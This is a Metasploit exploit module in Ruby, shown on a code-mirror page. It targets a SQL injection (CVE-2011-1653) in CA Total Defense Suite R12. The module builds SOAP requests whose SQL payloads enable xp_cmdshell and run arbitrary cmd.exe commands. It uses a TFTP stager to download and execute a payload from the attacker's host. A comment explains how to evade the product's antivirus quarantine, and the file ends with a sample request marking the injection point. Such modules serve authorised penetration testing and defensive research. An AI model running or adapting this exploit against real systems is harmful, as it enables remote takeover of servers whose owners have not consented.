Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb
19592 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::CmdStager

10
  include Msf::Exploit::Remote::HttpClient

11
  include Msf::Exploit::EXE

12


13
  def initialize(info = {})

14
    super(

15
      update_info(

16
        info,

17
        'Name' => 'CA Total Defense Suite reGenerateReports Stored Procedure SQL Injection',

18
        'Description' => %q{

19
          This module exploits a SQL injection flaw in CA Total Defense Suite R12.

20
          When supplying a specially crafted soap request to '/UNCWS/Management.asmx', an

21
          attacker can abuse the reGenerateReports stored procedure by injecting arbitrary sql

22
          statements into the ReportIDs element.

23
        },

24
        'Author' => [ 'MC' ],

25
        'License' => MSF_LICENSE,

26
        'References' => [

27
          [ 'ZDI', '11-134' ],

28
          [ 'OSVDB', '74968'],

29
          [ 'CVE', '2011-1653' ],

30
        ],

31
        'Targets' => [

32
          [

33
            'Windows Universal',

34
            {

35
              'Arch' => ARCH_X86,

36
              'Platform' => 'win'

37
            }

38
          ]

39
        ],

40
        'CmdStagerFlavor' => 'tftp',

41
        'Privileged' => true,

42
        'Platform' => 'win',

43
        'DisclosureDate' => '2011-04-13',

44
        'DefaultTarget' => 0,

45
        'Notes' => {

46
          'Reliability' => UNKNOWN_RELIABILITY,

47
          'Stability' => UNKNOWN_STABILITY,

48
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

49
        }

50
      )

51
    )

52


53
    register_options(

54
      [

55
        Opt::RPORT(34443),

56
        OptBool.new('SSL', [ true, 'Use SSL', true ]),

57
        OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ])

58
      ]

59
    )

60
  end

61


62
  def windows_stager

63
    print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")

64
    tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']

65
    execute_cmdstager({ temp: '.', tftphost: tftphost })

66
    @payload_exe = generate_payload_exe

67


68
    print_status("Attempting to execute the payload...")

69
    execute_command(@payload_exe)

70
  end

71


72
  def execute_command(cmd, opts = {})

73
    #	NOTE: This module was tested against the MS SQL Server 2005 Express bundled with

74
    #	CA Total Defense Suite R12. CA's Total Defense Suite real-time protection

75
    #	will quarantine the default framework executable payload. Choosing an alternate

76
    #	exe template will bypass the quarantine.

77


78
    inject = [

79
      "'') exec master.dbo.sp_configure 'show advanced options', 1;reconfigure;--",

80
      "'') exec master.dbo.sp_configure 'xp_cmdshell',1;reconfigure;--",

81
      "'') exec master.dbo.xp_cmdshell 'cmd.exe /c #{cmd}';--",

82
    ]

83


84
    inject.each do |sqli|

85
      soap = %Q|<?xml version="1.0" encoding="utf-8"?>

86
<soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope">

87
  <soap12:Body>

88
    <reGenerateReports xmlns="http://tempuri.org/">

89
      <EnterpriseID>msf</EnterpriseID>

90
      <ReportIDs>#{sqli}</ReportIDs>

91
      <UserID>187</UserID>

92
    </reGenerateReports>

93
  </soap12:Body>

94
</soap12:Envelope>

95
    |

96


97
      res = send_request_cgi(

98
        {

99
          'uri' => '/UNCWS/Management.asmx',

100
          'method' => 'POST',

101
          'version' => '1.0',

102
          'ctype' => 'application/soap+xml; charset=utf-8',

103
          'data' => soap,

104
        }, 5

105
      )

106


107
      if (res and res.body =~ /SUCCESS/)

108
      # print_good("Executing command...")

109
      else

110
        fail_with(Failure::Unknown, 'Something went wrong.')

111
      end

112
    end

113
  end

114


115
  def exploit

116
    unless datastore['CMD'].blank?

117
      print_status("Executing command '#{datastore['CMD']}'")

118
      execute_command(datastore['CMD'])

119
      return

120
    end

121


122
    case target['Platform']

123
    when 'win'

124
      windows_stager

125
    else

126
      fail_with(Failure::Unknown, 'Target not supported.')

127
    end

128


129
    handler

130
  end

131
end

132
__END__

133
POST /UNCWS/Management.asmx HTTP/1.1

134
Host: 192.168.31.129

135
Content-Type: application/soap+xml; charset=utf-8

136
Content-Length: length

137


138
<?xml version="1.0" encoding="utf-8"?>

139
<soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope">

140
  <soap12:Body>

141
    <reGenerateReports xmlns="http://tempuri.org/">

142
      <EnterpriseID>string</EnterpriseID>

143
      <ReportIDs>string</ReportIDs>		<--boom!!

144
      <UserID>long</UserID>

145
    </reGenerateReports>

146
  </soap12:Body>

147
</soap12:Envelope>

148


149